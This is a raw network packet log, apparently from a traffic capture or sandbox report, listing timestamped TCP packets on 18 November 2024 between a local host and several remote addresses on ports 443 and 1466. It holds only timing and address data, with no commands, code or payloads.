                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757316113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757373095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757775068 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757791996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757860899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757874966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757922888 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758286953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758302927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758372068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758383036 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758435965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758733034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758745909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758816957 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758829117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758879900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759212971 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759224892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759295940 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759306908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759360075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759757996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759778976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759848118 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759859085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759922028 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760163069 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760175943 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760247946 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760260105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760315895 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760654926 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760668039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760750055 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760761023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760812998 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761163950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761178970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761261940 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761272907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761328936 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761574030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761634111 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761656046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761668921 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761698961 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761733055 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761974096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761986971 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762042999 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762053967 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762078047 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762105942 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762360096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762377024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762449026 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762458086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762469053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762486935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762521029 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762531996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762553930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762559891 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762569904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762588024 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762598991 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762654066 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762676954 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762689114 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762743950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762754917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762790918 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762808084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762811899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762823105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762860060 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762909889 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762919903 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762931108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.762993097 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.763005018 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.763241053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.763303041 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770289898 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770307064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770375967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770387888 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770437956 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770541906 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770555973 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770628929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770642042 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770694971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770814896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770828009 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770888090 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770899057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770937920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770953894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770962954 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770973921 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.770999908 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771060944 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771274090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771297932 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771348000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771364927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771398067 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771419048 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771497965 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771522999 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771557093 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771567106 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771606922 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771620989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771637917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771646023 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771656036 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771697998 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.771738052 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772289038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772301912 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772358894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772370100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772420883 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772725105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772737980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772792101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772803068 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.772859097 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781045914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781074047 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781121016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781131983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781161070 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781182051 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781630993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781649113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781699896 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781709909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781740904 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.781761885 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782334089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782358885 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782402992 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782413006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782461882 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782461882 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782838106 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782854080 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782917976 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782928944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.782996893 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.783273935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.783288956 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.783349991 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.783360958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.783416033 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784171104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784185886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784255028 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784265995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784321070 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784502983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784518003 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784573078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784584045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784636021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784992933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785006046 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785072088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785083055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785137892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785311937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785330057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785387039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785398960 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785425901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785445929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785842896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785861969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785927057 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785938025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785990953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819031954 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819077015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819114923 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819135904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819165945 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819185019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820875883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820889950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820951939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820964098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821017981 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821580887 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821595907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821664095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821676016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821732044 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822169065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822182894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822242022 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822252989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822309017 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822801113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822815895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822879076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822890043 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822942972 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823385000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823401928 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823466063 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823477030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823525906 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823812962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823844910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823880911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823889017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823918104 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823940039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824199915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824237108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824259996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824279070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959291935 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959397078 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959502935 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.960879087 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.960910082 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821669102 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821899891 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821949005 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.827045918 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.827064991 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.828553915 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.828640938 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870871067 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870969057 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870976925 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.915332079 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.922705889 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.922739983 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.969646931 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.470923901 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.470985889 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471005917 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471054077 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471072912 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471088886 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471153021 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471209049 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471239090 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.589972973 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.589996099 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590043068 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590096951 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590172052 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590213060 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590235949 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590869904 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590941906 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.709558964 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.709630966 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.709666014 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.709707022 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.709779978 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.710139036 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.710174084 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.710201025 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.710216045 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.710763931 CET497191466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.715801954 CET14664971962.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.715991974 CET497191466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.716367960 CET497191466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.721436024 CET14664971962.60.234.80192.168.2.16
